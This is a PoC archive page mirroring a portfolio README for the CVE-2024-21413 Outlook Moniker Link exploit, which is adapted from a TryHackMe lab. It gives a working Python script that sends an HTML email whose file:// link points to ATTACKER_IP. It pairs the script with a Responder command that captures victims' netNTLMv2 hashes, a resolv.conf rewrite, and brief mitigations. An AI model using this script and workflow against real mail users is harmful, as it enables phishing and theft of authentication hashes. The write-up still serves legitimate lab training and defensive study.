目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CVE-2024-21413 PoC — Microsoft Outlook 安全漏洞

来源
关联漏洞
标题: Microsoft Outlook 安全漏洞 (CVE-2024-21413)
Description:Microsoft Outlook是美国微软(Microsoft)公司的一套电子邮件应用程序。 Microsoft Outlook 存在安全漏洞。以下产品和版本受到影响:Microsoft Office 2019 for 32-bit editions,Microsoft Office 2019 for 64-bit editions,Microsoft 365 Apps for Enterprise for 32-bit Systems,Microsoft 365 Apps for Enterprise
介绍
# Email exploit Moniker Link-CVE-2024-21413-Module — Documentation

**Overview:** A practical PoC demonstrating the use of a Moniker Link in an HTML email to trigger an SMB connection from Outlook, allowing capture of a victim's netNTLMv2 hash via Responder. This showcases practical skills in penetration testing, scripting, and network protocol analysis.

---

## Key Skills Demonstrated

* Python scripting for automated email delivery
* Understanding of SMB, NTLMv2, LLMNR, NBT-NS and MDNS protocols
* Responder configuration and monitoring for hash capture
* Troubleshooting Linux network/DNS configuration issues
* Crafting a controlled offensive security scenario in a lab environment

---

## PoC Workflow

1. **Setup SMB listener:** Start Responder on the attack machine to monitor SMB authentication attempts.
2. **Send crafted email:** Use a Python script to deliver an HTML email with a Moniker Link (`file://`) pointing to the attacker's SMB share.
3. **Hash capture:** When the victim clicks the link, Outlook attempts to fetch the file over SMB, and Responder captures the netNTLMv2 hash.

---

## Minimal Exploit Script

```python
# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender = 'attacker@monikerlink.thm'
receiver = 'victim@monikerlink.thm'
mailserver = '10.201.52.124'  # THM SMTP server
password = input('Enter attacker email password: ')

html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'

msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))

with smtplib.SMTP(mailserver, 25) as s:
    s.ehlo()
    s.login(sender, password)
    s.sendmail(sender, [receiver], msg.as_string())
    print('Email delivered')
```

*Tip:* Replace `ATTACKER_IP` and `mailserver` before running. In the TryHackMe lab, the password is `attacker`.

---

## Running Responder

```bash
responder -I ens5
```

*Replace `ens5` with your network interface name.*

---

## Troubleshooting `/etc/resolv.conf`

Sometimes Responder fails due to broken symlinks in `/etc/resolv.conf`. Fix with:

```bash
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf
```

*Skills highlighted:* Linux troubleshooting, DNS configuration, and adapting tools to cloud/VM environments.

---

## Progress Screenshots

1. **Error / Resolv.conf Issue**:`
   ![Error Resolv.conf](Email%20exploit/error%20resolv.conf.PNG)

2. **DNS Fix Applied**: 
   ![DNS Setup Fix](Email%20exploit/dns%20setup%20fix.PNG)

3. **Python Email Script**:
   ![Python Email Script](Email%20exploit/python%20email%20script.PNG)

4. **Exploit Delivery**:
   ![Exploit Delivery](Email%20exploit/exploit%20delivery.PNG)

5. **Victim Inbox**:
   ![Victim Email](Email%20exploit/victime%20email.PNG)

6. **Captured Victim Hash**: 
   ![Captured Victim Hash](Email%20exploit/Victime%20hash.PNG)

---

## Tools & Commands Used

* **Responder**: SMB/LLMNR/NBT-NS/MDNS listener
* **Python3**: PoC email script execution
* **smtplib / email.mime**: Python libraries for crafting and sending emails
* Linux shell commands for DNS troubleshooting

---

## Skills Learned / Portfolio Highlight

* Network attack simulation and exploitation workflow
* Automation of social engineering vector (Moniker Link email)
* Capturing and analyzing netNTLMv2 hashes
* Cross-discipline troubleshooting: Python, networking, Windows & Linux interaction
* Documentation and workflow presentation for technical reviewers

---

## Mitigation & Defensive Notes

* Disable automatic external content in Outlook
* Block outbound SMB to untrusted networks
* Enforce SMB signing and modern authentication policies on Windows clients

---

## Attribution

Adapted from TryHackMe MonikerLink lab and original PoC by CMNatic ([GitHub](https://github.com/cmnatic))
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →